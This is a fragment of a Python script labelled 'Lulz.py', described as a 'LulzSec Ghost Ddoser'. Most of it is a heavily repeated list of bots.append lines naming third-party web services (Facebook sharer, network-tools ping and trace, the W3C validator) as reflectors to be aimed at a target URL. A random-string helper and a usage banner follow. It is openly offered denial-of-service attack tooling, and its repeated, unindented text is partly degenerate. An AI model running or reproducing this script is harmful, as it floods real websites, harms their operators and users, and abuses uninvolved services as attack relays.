bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
return(bots)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print 'Usage: python Lulz.py <url>'
print 'LulzSec Ghost Ddoser By V3I0p3r'
print 'Private script of LulzSec Ghost'
